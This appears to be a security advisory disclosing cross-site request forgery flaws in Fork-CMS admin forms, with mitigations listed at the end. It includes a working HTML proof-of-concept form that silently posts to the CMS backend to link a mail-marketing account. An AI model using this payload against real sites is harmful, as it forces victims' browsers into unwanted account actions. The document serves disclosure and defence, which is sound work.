====================================================================================
Fork-CMS CSRF:
Introduction
Author: Rafay Baloch
CSRF OR XSRF (Cross site request forgery) occurs when the victim forces
your browser to send a forged request and makes
the victim performing a particular action. Any form missing with CSRF
tokens is vulnerable to it.
Impact:
An attacker can accomplish multiple things, he could change the victims
form details etc.
PROOF OF CONCEPT:
The above two forms are misssing with CSRF tokens:
The form is missing with CSRF tokens which means that an attacker can force
a user to link to a campaign monitor account.
http://demo.fork-cms.com/private/en/mailmotor/settings?token=true#tabSettingsAccount
POC:
<html>
<body>
<form action="http://demo.fork-cms.com/backend/ajax.php" method="POST">
<input type="hidden" name="fork[module]" value="mailmotor" />
<input type="hidden" name="fork[action]"
value="link_account" />
<input type="hidden" name="fork[language]" value="en" />
<input type="hidden" name="url" value="www.google.com" />
<input type="hidden" name="username" value="rafaybaloch" />
<input type="hidden" name="password" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
http://demo.fork-cms.com/private/en/settings/email
http://demo.fork-cms.com/backend/ajax.php
Mitigations:
- Reauthenticate the user, if he performs an important action upon his
account, e.g delete a user, delete himselves etc.
- Add a CSRF token to each and every request and make sure that it is
validated upon the server.
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information